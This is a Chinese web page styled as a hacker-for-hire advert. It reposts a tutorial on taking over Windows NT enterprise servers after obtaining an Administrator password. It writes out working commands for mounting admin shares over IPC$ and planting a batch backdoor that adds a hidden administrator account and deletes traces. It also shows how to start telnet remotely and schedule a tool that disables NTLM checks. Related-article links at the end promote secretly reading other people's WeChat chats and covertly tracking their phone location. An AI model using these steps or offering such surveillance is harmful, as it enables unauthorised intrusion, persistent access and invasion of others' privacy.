24小时接单的顶级黑客2020年专业黑客24小时接单2020

访客4年前黑客工具880

 现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 

  得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认为密码为空没什么,因为他们压根就不知道“黑客”会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。 

  首先,我们先假定得到了某个企业的一台服务器192.168.0.1的Administrator的密码,而对方没有关闭139端口。 

  1.普通共享资源的入侵 

  这种入侵手法可说是NT最简单的入侵了。随便在自己机器的哪个窗口的地址栏里输入“\\192.168.0.1”大概等1-2秒,对方就会要求你输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了。由于权限是Admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享为只读那就没办法了) 

  2.默认及隐藏共享资源的入侵 

  在说这种入侵 *** 之前我先来给大家介绍一个NT的IPC$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。IPC$是专门用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。 

  这次手法相对高明一点,但还是很简单的。不过关键还是要看“黑客”如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口,在地址栏输入“\\192.168.0.1”就会要求输入密码,输入以后所看到的东西和前面介绍的一样。好了,现在同时也建立好IPC$连接了,其实在提示你输入密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在地址栏输入地址,这次输入的就有点不同了,输入“\\192.168.0.1\c$”大概过一会就出现了对方C盘里所有的内容了。想看对方D盘吗?同样,输入“\\192.168.0.1\D$”就看见对方D盘了。然后想换这个企业的主页(假如对方还是一个Web服务器)可以说是轻而易举。记住由于权限是管理员当然可以写了,留不留后门就看“黑客”的想法咯。一般他们会在C盘(假设在C:\\WINNT下)建立一个批处理文件,假设文件名为hack.bat,其内容一般为: 

  net user hack 1234 /add (建立一个用户名为hack的用户,密码为1234) 

  net localgroup administrators hack /add (让hack也是管理员) 

  del C:\Documents and Settings\Administrator\开始\菜单\程序\启动\hack.lnk (删除启动文件夹里的快捷方式消除足迹) 

  del c:\winnt\hack.bat (删除hack.bat这个文件消除足迹) 

  这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个比较愚蠢的留“后门”的 *** 了,所以其实很多“黑客”会放一个可以常驻内存的小程序,然后建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占有企业中的这台主机了。 

3.IPC$连接入侵的高级手段 

  然而每个“黑客”都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往“黑客”会使用更加巧妙的手法,迅速的留下后门。首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开Telnet服务,“黑客”怎么打开Telnet服务呢?其实有很多种 *** ,比如微软公司自己就出了一个小程序“netsvc.exe”就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个工具到了“黑客”手中自然也成了必不可少的“黑客”工具了。在命令符下输入“netsvc \\192.168.0.1 telnet /start”大概等5分钟对方的Telnet服务就打开了,然后“telnet 192.168.0.1”嘿嘿……等!需要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了,可怎么让他运行呢?当然多的是办法了。“net time \\192.168.0.1”看看对方系统时间为多少假设为18:00。现在再输入“at \\192.168.0.1 18:02 ntlm.exe”,等一会后,命令提示符显示新加任务 ID=1,意思是对方系统在18:02时运行ntlm.exe这个程序,等到18:02以后,然后再“telnet 192.168.0.1”嘿嘿~这回是提示需要输入用户和密码了,输入所得到的管理员用户名和密码以后就成功的Telnet到了企业服务器了…… 

  不过这样一下是Netsvc,一下又是At实在是麻烦,现在就介绍另一个 *** ,首先还是先感谢微软为NT系统管理员提供的方便的管理功能,这一功能到了“黑客”手中可说是“黑客”的福音,不用“黑客”再这么麻烦的输入这样那样的命令了。建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接),打开本地计算机里的“计算机管理”,用鼠标右键点计算机管理窗口里的“计算机管理(本地)”里面有“连接到另一台计算机”选择它,在“名称”里输入“192.168.0.1”确定以后,首先你的NT系统会看是否建立IPC$连接,“有”就连接上去了,现在你就可以直接管理192.168.0.1了,比如看他的日志,启动他的服务(当然包括Telnet了),管理他的IIS,什么都有。多研究一下,连注销对方系统当前登陆的用户,重新启动对方计算机,关闭对方计算机都有,真是强大。NT系统到了“黑客”手中,整个系统都成了一个“黑客”工具了,而且是功能非常强大的“黑客”工具。启动了Telnet了,可还是要NTLM验证怎么办?简单,在本地计算机建立一个用户名和密码相同的用户,如果已有就把密码改为相同,然后使用这个用户在本地重新登陆,“telnet 192.168.0.1”嘿嘿~连密码都不用输入了!因为通过NTLM验证了啊。

相关文章

如何远程监控别人的手机微信聊天记录?怎么同步登陆别人微信聊天记录

微信是目前大家都使用的一种聊天工具,这就使得很多人都在使用微信来和别人搞暧昧,或者是联系的比较亲密,无论是在男女朋友阶段,还是在婚姻阶段,这使得另一半很不安,就想要知道对方每天联络的对象以及到底说了一...

安卓与苹果手机微信怎么悄悄偷偷定位别人的正确具体位...

无线网络,就是行使无线电波作为信息传输的前言组成的无线局域网(WLAN),与有线网络的用途十分类似,最大的差别在于传输前言的差别,行使无线电手艺取代网线,可以和有线网络互为备份。   Wi-Fi 俗称...

新用户注册20+天完成50+单交易:快手直播的种草能力堪比放毒

新用户注册20+天完成50+单交易:快手直播的种草能力堪比放毒

一个初来乍到的新手,是怎么仅用二十多天就在快手完成了五十多单的交易呢?快手是如何让一个“初来乍到”的新用户如此这般中毒已深呢? 下载使用仅二十多天,她就在快手完成了五十多单交易。 对,她是我的一个好...

dnf虚空魔石怎么得(dnf虚空魔石碎片产出)

dnf虚空魔石怎么得(dnf虚空魔石碎片产出)

大改版已经过去两天了,每次改变都会导致部分物品物价变动,这次阿森就来说下虚空魔石和魔刹石。 虚空魔石改版之后可以说价格大跌,由改版前的7800金币猛跌至现在2200金币一个,究其原因,不过是TX将虚...

微信群管理员怎么踢人

群管理员如何踢人,为您出示群管理员如何踢人视頻及相匹配文图信息内容,最先进入微信,随后点一下挑选一个微信群,点一下右上角小一点,进到微信群设定网页页面,群管理员能够点一下减号开展删人,挑选必须删掉的q...

木代尔是啥(“莫代尔”到底是一种哪些的布料?)

木代尔是啥(“莫代尔”到底是一种哪些的布料?)

假如你打开网络购物平台,要想购买一套贴身衣服时,有没有发现绝大部分你查找到的商品都带着“莫代尔”三个字?日常日常生活,与它有关的品类除了各式各样贴身衣服外,还包括其他的一些家居装饰品,比如床单、毛巾和...